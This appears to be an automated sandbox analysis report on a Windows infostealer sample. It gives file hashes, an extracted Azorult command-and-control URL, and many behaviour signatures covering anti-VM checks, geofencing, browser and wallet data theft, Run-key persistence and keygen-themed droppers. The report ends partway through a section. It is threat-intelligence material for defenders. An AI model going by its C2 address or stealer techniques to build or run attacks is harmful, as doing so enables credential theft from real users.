Resubmissions
21-10-2021 11:49
211021-nzczcsacb2 1020-10-2021 14:55
211020-sagcpshbf9 1019-10-2021 14:57
211019-sb3bkaghgn 1019-10-2021 14:24
211019-rqq2eagab5 10Analysis
-
max time kernel
594s -
max time network
1606s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
19-10-2021 14:24
Static task
static1
General
-
Target
malware.exe
-
Size
11.9MB
-
MD5
5544ca0d55ecf9e4f1a738f01bcebe84
-
SHA1
54cf5562fd1e992baff6060f5262cecf5449fe1c
-
SHA256
37aa2beb667b66b5b548722f4a5b7c72d01b191c538e4ad1acb9467cbc5d8727
-
SHA512
676bd327e881bfea4134e60c97cf67fb500dc261d2e3515762ed098e9e56eb558fbec159a1af593aafcdb53f4892e33a5a28fe895be89a9f90c340cde68ba71f
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3664 4004 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3052 5380 rundll32.exe -
Socelars Payload 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\Tue13c1be0d8f62bc.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 4676 created 3976 4676 WerFault.exe Tue130c270d23c79.exe PID 5044 created 4432 5044 WerFault.exe Tue13a47d89c50.exe PID 7456 created 4232 7456 WerFault.exe dds4TfzYp9QVoKSZWjdvpOap.exe PID 5548 created 4196 5548 WerFault.exe H0CeEMPSUFWGICASTuD05aaY.exe PID 6812 created 8012 6812 WerFault.exe W6dQhnol2X1JHQB0qLL6rcXv.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\7zS40C56A97\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS40C56A97\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS40C56A97\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS40C56A97\libcurlpp.dll aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 422 2252 mshta.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
ShareFolder.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe -
Executes dropped EXE 64 IoCs
Processes:
CrowdInspect.exeCrowdInspect64.exeCity_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exekeygen-pr.exekeygen-step-1.exekeygen-step-6.exekeygen-step-3.exekeygen-step-4.exekey.exeCrack.exeSetup.exeQmiWmcaRxjnYchsQZn0ahCpU.exesetup_x86_x64_install.exemd1_1eaf.exesetup_installer.exesetup_install.exeTue130c270d23c79.exe1HR1MySDS9W4Xh4BuTVhlZvx.exeG9glq53LJPiE8StANY6HSQ0T.exedds4TfzYp9QVoKSZWjdvpOap.exeTS8C7UyMm7f4cONqJ7WGeWsJ.exeH0CeEMPSUFWGICASTuD05aaY.exeCalculator.exeRmlYM6m_MkNIs4hsfQ2xhK0w.exeTue13a47d89c50.exeTue13bbed6e0bb6.exeTue13c1be0d8f62bc.exeTue13d68628efddb1.exe0bB8aprULCmL4OW0bMY9mihf.exeVDrYzJIhYBfsOxUVjD6qOlHo.exeY59NcCyhjTNabUyy_rSrn88j.exeXdkhZJCvff8a50yAYGJZolZJ.exezCXMiv3RosvYx3Ad7qwEftH6.exe7KAQ13EUayjF7l_ONZLsO4KC.exemshta.exeTue132b1547125d9.execuDHLwVUXRBFsKiCmh1izlnZ.exesyotsWcKf5oS_xIcnKpHdZgl.exe5GRfaQA90kKihOxhbAmX5q1H.exeTue132dd525eb51d2.exeTue137fdfa416e28ff.exeTue13a98da3f882e5.exeTue136037e6ffe49ce8.exe5uUZlD6B0cEHDSZBuDNnYK55.exeCrowdInspect64.exemshta.exeTue13743175c95e24e0.exeCwkpDrSvORlcHiAeld52hPsK.exeAtWo1C_0o4EgMkXZ8i70FmrD.exeTue13bd9cb08d6.exeTue136037e6ffe49ce8.tmpFhLKl5cj19hUvdWkcqQyDNUv.exeTue13a3eaad6ca1da2.exedHTl_RtE2hNmhOES7j1a4rLs.exeTue136037e6ffe49ce8.exeTue13530584f2459af.exesetup.exeTue13a3eaad6ca1da2.exeTue13530584f2459af.executm3.exeCalculator.exeinst3.exeTue136037e6ffe49ce8.tmppid process 2444 CrowdInspect.exe 2200 CrowdInspect64.exe 3128 City_Car_Driving_Version_2_2_serial_number_keygen_by_aaocg.exe 3796 keygen-pr.exe 1056 keygen-step-1.exe 3548 keygen-step-6.exe 1716 keygen-step-3.exe 648 keygen-step-4.exe 600 key.exe 2076 Crack.exe 2120 Setup.exe 432 QmiWmcaRxjnYchsQZn0ahCpU.exe 2968 setup_x86_x64_install.exe 1572 md1_1eaf.exe 3076 setup_installer.exe 2796 setup_install.exe 3976 Tue130c270d23c79.exe 4184 1HR1MySDS9W4Xh4BuTVhlZvx.exe 4220 G9glq53LJPiE8StANY6HSQ0T.exe 4232 dds4TfzYp9QVoKSZWjdvpOap.exe 4204 TS8C7UyMm7f4cONqJ7WGeWsJ.exe 4196 H0CeEMPSUFWGICASTuD05aaY.exe 4304 Calculator.exe 4316 RmlYM6m_MkNIs4hsfQ2xhK0w.exe 4432 Tue13a47d89c50.exe 4420 Tue13bbed6e0bb6.exe 4444 Tue13c1be0d8f62bc.exe 4456 Tue13d68628efddb1.exe 4480 0bB8aprULCmL4OW0bMY9mihf.exe 2292 VDrYzJIhYBfsOxUVjD6qOlHo.exe 2916 Y59NcCyhjTNabUyy_rSrn88j.exe 4760 XdkhZJCvff8a50yAYGJZolZJ.exe 1412 zCXMiv3RosvYx3Ad7qwEftH6.exe 4764 7KAQ13EUayjF7l_ONZLsO4KC.exe 4708 mshta.exe 4876 Tue132b1547125d9.exe 4832 cuDHLwVUXRBFsKiCmh1izlnZ.exe 4824 syotsWcKf5oS_xIcnKpHdZgl.exe 3160 5GRfaQA90kKihOxhbAmX5q1H.exe 4932 Tue132dd525eb51d2.exe 3784 Tue137fdfa416e28ff.exe 360 Tue13a98da3f882e5.exe 4128 Tue136037e6ffe49ce8.exe 4216 5uUZlD6B0cEHDSZBuDNnYK55.exe 1200 CrowdInspect64.exe 2252 mshta.exe 4464 Tue13743175c95e24e0.exe 1380 CwkpDrSvORlcHiAeld52hPsK.exe 2180 AtWo1C_0o4EgMkXZ8i70FmrD.exe 4544 Tue13bd9cb08d6.exe 2380 Tue136037e6ffe49ce8.tmp 4604 FhLKl5cj19hUvdWkcqQyDNUv.exe 4104 Tue13a3eaad6ca1da2.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 4820 Tue136037e6ffe49ce8.exe 5296 Tue13530584f2459af.exe 5500 setup.exe 5524 Tue13a3eaad6ca1da2.exe 5532 Tue13530584f2459af.exe 5984 cutm3.exe 5996 Calculator.exe 6036 inst3.exe 4820 Tue136037e6ffe49ce8.exe 5372 Tue136037e6ffe49ce8.tmp -
Modifies Installed Components in the registry 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 50 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
mRvJABXCifSAhUTtaxEQl7t8.exeNkkVSZW229sS2SE1vtc4j53k.exesvchost.exeXdkhZJCvff8a50yAYGJZolZJ.exe5uUZlD6B0cEHDSZBuDNnYK55.exesvchost.exeh7pNaKg1Ramme0ohTtFbfQ3J.exe8320946.exe3116841.exe1597993.exe8950614.exe5GRfaQA90kKihOxhbAmX5q1H.exeAFad10bImeuPMYb1rnBi1y1t.exe6090931.exe4H4t2AsOcQSAHdHBjitYzETp.exe7294222.exeVDrYzJIhYBfsOxUVjD6qOlHo.exe1HR1MySDS9W4Xh4BuTVhlZvx.exeaaaSPc2PtzvTAeDTpwDSd3PG.exe1145901.exei2CgVIrZifSNZnjq75V_2cUY.exe6009642.exe6262846.exesyotsWcKf5oS_xIcnKpHdZgl.exe6654171.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mRvJABXCifSAhUTtaxEQl7t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mRvJABXCifSAhUTtaxEQl7t8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion NkkVSZW229sS2SE1vtc4j53k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion XdkhZJCvff8a50yAYGJZolZJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5uUZlD6B0cEHDSZBuDNnYK55.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion h7pNaKg1Ramme0ohTtFbfQ3J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8320946.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3116841.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1597993.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8950614.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5GRfaQA90kKihOxhbAmX5q1H.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion AFad10bImeuPMYb1rnBi1y1t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion NkkVSZW229sS2SE1vtc4j53k.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6090931.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4H4t2AsOcQSAHdHBjitYzETp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7294222.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7294222.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8320946.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion VDrYzJIhYBfsOxUVjD6qOlHo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1HR1MySDS9W4Xh4BuTVhlZvx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion h7pNaKg1Ramme0ohTtFbfQ3J.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aaaSPc2PtzvTAeDTpwDSd3PG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1145901.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aaaSPc2PtzvTAeDTpwDSd3PG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion i2CgVIrZifSNZnjq75V_2cUY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3116841.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6009642.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6262846.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion syotsWcKf5oS_xIcnKpHdZgl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion syotsWcKf5oS_xIcnKpHdZgl.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8950614.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion VDrYzJIhYBfsOxUVjD6qOlHo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5GRfaQA90kKihOxhbAmX5q1H.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6654171.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion i2CgVIrZifSNZnjq75V_2cUY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6090931.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6262846.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1HR1MySDS9W4Xh4BuTVhlZvx.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion XdkhZJCvff8a50yAYGJZolZJ.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5uUZlD6B0cEHDSZBuDNnYK55.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1145901.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1597993.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6009642.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4H4t2AsOcQSAHdHBjitYzETp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion AFad10bImeuPMYb1rnBi1y1t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6654171.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Calculator.exeCrowdInspect64.exeSetup.exeTue13d68628efddb1.exeTue132dd525eb51d2.execRacS9rhR__TiismTflL68cH.exeCalculator.exeCalculator.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation CrowdInspect64.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Tue13d68628efddb1.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Tue132dd525eb51d2.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation cRacS9rhR__TiismTflL68cH.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Calculator.exe -
Loads dropped DLL 64 IoCs
Processes:
rundll32.exesetup_install.exeTue136037e6ffe49ce8.tmpdHTl_RtE2hNmhOES7j1a4rLs.exeTue136037e6ffe49ce8.tmprundll32.exesetup.tmp7dFCJ8QWIik4RzL943IocouY.exesetup.exeLzmwAqmV.exesetup.tmpLzmwAqmV.exepid process 3160 rundll32.exe 2796 setup_install.exe 2796 setup_install.exe 2796 setup_install.exe 2796 setup_install.exe 2796 setup_install.exe 2796 setup_install.exe 2796 setup_install.exe 2380 Tue136037e6ffe49ce8.tmp 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 5372 Tue136037e6ffe49ce8.tmp 5116 rundll32.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 4744 dHTl_RtE2hNmhOES7j1a4rLs.exe 3792 setup.tmp 7784 7dFCJ8QWIik4RzL943IocouY.exe 7784 7dFCJ8QWIik4RzL943IocouY.exe 7632 setup.exe 7632 setup.exe 7784 7dFCJ8QWIik4RzL943IocouY.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 7784 7dFCJ8QWIik4RzL943IocouY.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 6580 setup.tmp 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 7784 7dFCJ8QWIik4RzL943IocouY.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3268 LzmwAqmV.exe 3268 LzmwAqmV.exe 3268 LzmwAqmV.exe 7784 7dFCJ8QWIik4RzL943IocouY.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3088 LzmwAqmV.exe 3268 LzmwAqmV.exe 3268 LzmwAqmV.exe 7784 7dFCJ8QWIik4RzL943IocouY.exe 3088 LzmwAqmV.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\1HR1MySDS9W4Xh4BuTVhlZvx.exe themida C:\Users\Admin\Pictures\Adobe Films\1HR1MySDS9W4Xh4BuTVhlZvx.exe themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
setup.exeShareFolder.exe1940640.exesetup.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --XpjC5" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\Lyzhupuvoshu.exe\"" ShareFolder.exe Set value (str) \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1940640.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --XpjC5" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
i2CgVIrZifSNZnjq75V_2cUY.exesvchost.exesyotsWcKf5oS_xIcnKpHdZgl.exe1HR1MySDS9W4Xh4BuTVhlZvx.exe5uUZlD6B0cEHDSZBuDNnYK55.exesvchost.exe4H4t2AsOcQSAHdHBjitYzETp.exemRvJABXCifSAhUTtaxEQl7t8.exeAFad10bImeuPMYb1rnBi1y1t.exe7294222.exe6654171.exe5GRfaQA90kKihOxhbAmX5q1H.exe1145901.exeh7pNaKg1Ramme0ohTtFbfQ3J.exeaaaSPc2PtzvTAeDTpwDSd3PG.exe6262846.exe8950614.exeNkkVSZW229sS2SE1vtc4j53k.exe6090931.exe8320946.exe3116841.exeVDrYzJIhYBfsOxUVjD6qOlHo.exeXdkhZJCvff8a50yAYGJZolZJ.exemd1_1eaf.exe6009642.exe1597993.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA i2CgVIrZifSNZnjq75V_2cUY.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA syotsWcKf5oS_xIcnKpHdZgl.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1HR1MySDS9W4Xh4BuTVhlZvx.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5uUZlD6B0cEHDSZBuDNnYK55.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4H4t2AsOcQSAHdHBjitYzETp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mRvJABXCifSAhUTtaxEQl7t8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA AFad10bImeuPMYb1rnBi1y1t.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7294222.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6654171.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5GRfaQA90kKihOxhbAmX5q1H.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1145901.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA h7pNaKg1Ramme0ohTtFbfQ3J.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA aaaSPc2PtzvTAeDTpwDSd3PG.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6262846.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8950614.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NkkVSZW229sS2SE1vtc4j53k.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6090931.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8320946.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3116841.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VDrYzJIhYBfsOxUVjD6qOlHo.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA XdkhZJCvff8a50yAYGJZolZJ.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md1_1eaf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6009642.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1597993.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
svchost.exeexplorer.exedescription ioc process File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\D: explorer.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\F: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\T: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 380 ipinfo.io 383 ipinfo.io 700 ipinfo.io 126 ipinfo.io 127 ipinfo.io 310 ipinfo.io 312 ipinfo.io 351 ipinfo.io 701 ipinfo.io 887 ipinfo.io 308 ip-api.com 729 ipinfo.io 888 ipinfo.io -
Drops file in System32 directory 14 IoCs
Processes:
svchost.exesvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 3222E1A0243FEB90 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F svchost.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl LG svchost.exe File opened for modification C:\Windows\System32\Tasks\Timer svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
Processes:
